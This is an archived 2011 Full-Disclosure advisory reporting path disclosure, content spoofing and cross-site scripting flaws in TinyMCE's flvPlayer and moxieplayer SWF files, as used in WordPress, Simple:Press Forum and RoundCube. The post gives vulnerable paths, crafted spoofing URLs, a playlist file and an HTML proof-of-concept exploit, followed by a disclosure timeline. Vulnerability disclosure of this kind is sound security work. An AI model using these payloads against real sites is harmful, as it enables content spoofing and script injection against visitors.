| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <00e901ccac3f$7b1829c0$9b7a6fd5@ml>
Date: Sat, 26 Nov 2011 15:29:17 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities in TinyMCE and flvPlayer
and hundreds of web applications
Hello list!
I want to warn you about multiple vulnerabilities in TinyMCE and flvPlayer
and hundreds of web applications and tens millions of web sites.
These are Full path disclosure, Content Spoofing and Cross-Site Scripting
vulnerabilities in TinyMCE (CS and XSS are in flvPlayer, which is included
with TinyMCE).
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of TinyMCE, which include these files. And
vulnerable (to CS and XSS) are all versions of flvPlayer (flvPlayer v1.0b).
And also all web applications, which are using these versions of TinyMCE and
flvPlayer, and it's hundreds of web applications and tens millions of web
sites in Internet. By information from wordpress.com, at present there are
more then 67 millions of web sites only on WordPress, almost half of them
are hosted at blog-hosting wordpress.com.
Particularly the next web applications are vulnerable:
* WordPress 2.6 - 3.1.1 (which I've checked, and potentially WP 2.5 - 3.2.1)
to FPD. To Content Spoofing are vulnerable versions with file flv_player.swf
(in plugin media in TinyMCE), which is in WP 2.6 - 3.0.1 (which I've
checked, and potentially WP 2.5 - 3.0.5).
* Simple:Press Forum 4.4.5 and previous versions.
* RoundCube 0.6 and previous versions (checked in 0.4-beta and 0.6) to СS
and XSS. In last version RoundCube 0.6 uses moxieplayer.swf (instead of
flv_player.swf).
* And many other web applications.
----------
Details:
----------
Full path disclosure (WASC-13):
http://site/path/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://site/path/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://site/path/tinymce/plugins/spellchecker/classes/PSpell.php
http://site/path/tinymce/plugins/spellchecker/classes/PSpellShell.php
Content Spoofing (WASC-12):
For WordPress:
http://site/wp-includes/js/tinymce/plugins/media/img/flv_player.swf
For Simple:Press Forum:
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/img/media/flv_player.swf
For RoundCube:
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf
Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay and
startImage, which allows to spoof content of flash - i.e. by setting
addresses of video and/or image files from other site.
http://site/flv_player.swf?flvToPlay=1.flv
http://site/flv_player.swf?autoStart=false&startImage=1.jpg
http://site/flv_player.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay,
which allows to spoof content of flash - i.e. by setting address of playlist
file from other site (parameters thumbnail and url in xml-file accept
arbitrary addresses).
http://site/flv_player.swf?flvToPlay=1.xml
File 1.xml:
<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>
XSS (WASC-08):
If at the site at page with flv_player.swf (with parameter jsCallback=true,
or if there is possibility to set this parameter for flv_player.swf) there
is possibility to include JS code with function flvStart() and/or flvEnd()
(via HTML Injection), then it's possible to conduct XSS attack. I.e.
JS-callbacks can be used for XSS attack.
Example of exploit:
<html>
<body>
<script>
function flvStart() {
alert('XSS');
}
function flvEnd() {
alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%"
height="50%" quality=high
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>
Starting from TinyMCE 3.4b2, it includes moxieplayer.swf.
Content Spoofing (WASC-12):
http://site/path/moxieplayer.swf?url=http://site2/1.flv
This swf-file accepts arbitrary addresses in parameter url, which allows to
spoof content of flash - i.e. by setting address of video file from other
site.
------------
Timeline:
------------
2011.10.15 - found vulnerabilities.
2011.10.17 - announced at my site.
2011.10.20 - informed developer of flvPlayer.
2011.10.20 - informed developer of TinyMCE. During my conversation with
developer during October-November, he wanted to fix these holes, but it took
much more time, then he thought at first. He is working on fix, which will
be released in future version of TinyMCE.
2011.10.21 - informed developer of RoundCube. During my conversation with
developer during October-November, he decided to fix them and was working on
fix for these and other holes, which I've informed him.
2011.11.23 - developer of RoundCube informed that all fixes have been made
and would be added to the next release RoundCube 0.7.
2011.11.23 - disclosed at my site.
I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5444/
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists